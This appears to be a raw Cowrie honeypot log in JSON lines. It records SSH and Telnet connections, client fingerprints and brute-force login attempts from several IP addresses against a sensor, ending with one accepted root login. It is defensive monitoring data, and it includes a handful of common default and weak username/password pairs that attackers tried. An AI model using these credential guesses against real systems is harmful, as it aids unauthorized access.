{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:45:58.371955Z","src_ip":"212.227.235.229","session":"d323548d9409"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-09-09T06:45:59.378341Z","src_ip":"212.227.235.229","session":"d323548d9409"}
{"eventid":"cowrie.session.closed","duration":120.00159645080566,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:59.902285Z","src_ip":"201.108.95.15","session":"7ee7a1ba9711"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:46:00.622378Z","src_ip":"212.227.235.229","session":"d323548d9409"}
{"eventid":"cowrie.session.closed","duration":31.184399604797363,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:46:15.255724Z","src_ip":"212.227.235.229","session":"4d36a3df935d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51322,"dst_ip":"1.2.3.4","dst_port":22,"session":"c85cd0bca1ea","protocol":"ssh","message":"New connection: 212.227.235.229:51322 (1.2.3.4:22) [session: c85cd0bca1ea]","sensor":"my-vps","timestamp":"2025-09-09T06:46:18.597178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:46:18.598934Z","src_ip":"212.227.235.229","session":"c85cd0bca1ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:46:18.665866Z","src_ip":"212.227.235.229","session":"c85cd0bca1ea"}
{"eventid":"cowrie.login.failed","username":"alex","password":"abc123","message":"login attempt [alex/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:46:18.971770Z","src_ip":"212.227.235.229","session":"c85cd0bca1ea"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:46:20.039244Z","src_ip":"212.227.235.229","session":"c85cd0bca1ea"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":37052,"dst_ip":"1.2.3.4","dst_port":22,"session":"242eb4474a34","protocol":"ssh","message":"New connection: 92.118.39.62:37052 (1.2.3.4:22) [session: 242eb4474a34]","sensor":"my-vps","timestamp":"2025-09-09T06:46:23.636002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:46:23.636894Z","src_ip":"92.118.39.62","session":"242eb4474a34"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:46:23.667720Z","src_ip":"92.118.39.62","session":"242eb4474a34"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay","message":"login attempt [clay/clay] failed","sensor":"my-vps","timestamp":"2025-09-09T06:46:23.759190Z","src_ip":"92.118.39.62","session":"242eb4474a34"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:46:24.791196Z","src_ip":"92.118.39.62","session":"242eb4474a34"}
{"eventid":"cowrie.session.connect","src_ip":"82.215.85.80","src_port":35118,"dst_ip":"1.2.3.4","dst_port":23,"session":"0e81325c72c2","protocol":"telnet","message":"New connection: 82.215.85.80:35118 (1.2.3.4:23) [session: 0e81325c72c2]","sensor":"my-vps","timestamp":"2025-09-09T06:46:27.731152Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56675,"dst_ip":"1.2.3.4","dst_port":22,"session":"71f8fa2fa382","protocol":"ssh","message":"New connection: 212.227.235.229:56675 (1.2.3.4:22) [session: 71f8fa2fa382]","sensor":"my-vps","timestamp":"2025-09-09T06:46:42.158842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:46:42.159785Z","src_ip":"212.227.235.229","session":"71f8fa2fa382"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:46:42.276704Z","src_ip":"212.227.235.229","session":"71f8fa2fa382"}
{"eventid":"cowrie.login.failed","username":"info","password":"123","message":"login attempt [info/123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:46:42.782958Z","src_ip":"212.227.235.229","session":"71f8fa2fa382"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:46:43.899858Z","src_ip":"212.227.235.229","session":"71f8fa2fa382"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":45892,"dst_ip":"1.2.3.4","dst_port":22,"session":"69164aec7e84","protocol":"ssh","message":"New connection: 118.26.39.178:45892 (1.2.3.4:22) [session: 69164aec7e84]","sensor":"my-vps","timestamp":"2025-09-09T06:46:48.257345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:46:48.259131Z","src_ip":"118.26.39.178","session":"69164aec7e84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:46:49.294529Z","src_ip":"118.26.39.178","session":"69164aec7e84"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Welcome@1234","message":"login attempt [ubuntu/Welcome@1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:46:49.912060Z","src_ip":"118.26.39.178","session":"69164aec7e84"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:46:51.120158Z","src_ip":"118.26.39.178","session":"69164aec7e84"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":52022,"dst_ip":"1.2.3.4","dst_port":22,"session":"b902c76b483c","protocol":"ssh","message":"New connection: 157.20.207.165:52022 (1.2.3.4:22) [session: b902c76b483c]","sensor":"my-vps","timestamp":"2025-09-09T06:46:57.540456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:46:57.541123Z","src_ip":"157.20.207.165","session":"b902c76b483c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:46:57.729970Z","src_ip":"157.20.207.165","session":"b902c76b483c"}
{"eventid":"cowrie.session.closed","duration":30.68596625328064,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:46:58.417052Z","src_ip":"82.215.85.80","session":"0e81325c72c2"}
{"eventid":"cowrie.login.failed","username":"tcpdump","password":"tcpdump1234","message":"login attempt [tcpdump/tcpdump1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:46:58.504608Z","src_ip":"157.20.207.165","session":"b902c76b483c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:46:59.690371Z","src_ip":"157.20.207.165","session":"b902c76b483c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37793,"dst_ip":"1.2.3.4","dst_port":22,"session":"85d223c8b1ba","protocol":"ssh","message":"New connection: 212.227.235.229:37793 (1.2.3.4:22) [session: 85d223c8b1ba]","sensor":"my-vps","timestamp":"2025-09-09T06:47:12.914999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:47:12.915930Z","src_ip":"212.227.235.229","session":"85d223c8b1ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:47:13.158701Z","src_ip":"212.227.235.229","session":"85d223c8b1ba"}
{"eventid":"cowrie.login.failed","username":"agouser","password":"1234567890","message":"login attempt [agouser/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T06:47:14.725044Z","src_ip":"212.227.235.229","session":"85d223c8b1ba"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:47:15.972012Z","src_ip":"212.227.235.229","session":"85d223c8b1ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49316,"dst_ip":"1.2.3.4","dst_port":22,"session":"80fc937b02f5","protocol":"ssh","message":"New connection: 212.227.235.229:49316 (1.2.3.4:22) [session: 80fc937b02f5]","sensor":"my-vps","timestamp":"2025-09-09T06:47:46.449426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:47:46.450303Z","src_ip":"212.227.235.229","session":"80fc937b02f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:47:46.565879Z","src_ip":"212.227.235.229","session":"80fc937b02f5"}
{"eventid":"cowrie.login.failed","username":"testserver","password":"12345678","message":"login attempt [testserver/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T06:47:47.066280Z","src_ip":"212.227.235.229","session":"80fc937b02f5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:47:48.185023Z","src_ip":"212.227.235.229","session":"80fc937b02f5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58516,"dst_ip":"1.2.3.4","dst_port":22,"session":"b08236d6cf9c","protocol":"ssh","message":"New connection: 217.72.205.35:58516 (1.2.3.4:22) [session: b08236d6cf9c]","sensor":"my-vps","timestamp":"2025-09-09T06:47:57.727299Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:47:57.728409Z","src_ip":"217.72.205.35","session":"b08236d6cf9c"}
{"eventid":"cowrie.session.connect","src_ip":"116.196.70.63","src_port":51358,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7e482a14c2c","protocol":"ssh","message":"New connection: 116.196.70.63:51358 (1.2.3.4:22) [session: c7e482a14c2c]","sensor":"my-vps","timestamp":"2025-09-09T06:48:01.587636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:48:01.591719Z","src_ip":"116.196.70.63","session":"c7e482a14c2c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T06:48:01.812876Z","src_ip":"116.196.70.63","session":"c7e482a14c2c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:09.592274Z","src_ip":"116.196.70.63","session":"c7e482a14c2c"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":48882,"dst_ip":"1.2.3.4","dst_port":22,"session":"d09b0167f048","protocol":"ssh","message":"New connection: 118.26.39.178:48882 (1.2.3.4:22) [session: d09b0167f048]","sensor":"my-vps","timestamp":"2025-09-09T06:48:10.433517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:10.434444Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.134.205","src_port":57761,"dst_ip":"1.2.3.4","dst_port":23,"session":"edf0c43424ac","protocol":"telnet","message":"New connection: 103.59.134.205:57761 (1.2.3.4:23) [session: edf0c43424ac]","sensor":"my-vps","timestamp":"2025-09-09T06:48:11.305256Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:11.466999Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678a","message":"login attempt [root/12345678a] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:48:12.075719Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:48:12.546420Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
